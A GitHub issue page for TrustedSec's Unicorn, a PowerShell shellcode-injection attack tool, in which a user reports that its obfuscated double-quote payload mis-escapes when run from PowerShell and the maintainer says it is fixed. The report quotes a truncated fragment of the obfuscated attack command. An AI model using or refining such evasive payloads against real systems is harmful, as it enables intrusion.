trustedsec / unicorn

Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
https://www.trustedsec.com
Other
3.74k stars 817 forks source link

Random quotes escape \" does not work in powershell #139

Closed zvaratom closed 4 years ago

zvaratom commented 4 years ago

Hi, I am not sure if this is an intended behavior, but I spend some time on this issue so I will post it here. The double quote version payload does not work for me when run directly from powershell (due to the redundant \ as escape sign for cmd) powershell /C "s\"\"v Qf -;s\"\"v Dl e\"\"c;s\"\"v mg ((g\"\"v Qf).value.toString()+(g\"\"v Dl).value.toString()) ...

Error message:


spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1```
HackingDave commented 4 years ago

Fixed in 3.8.6, thanks!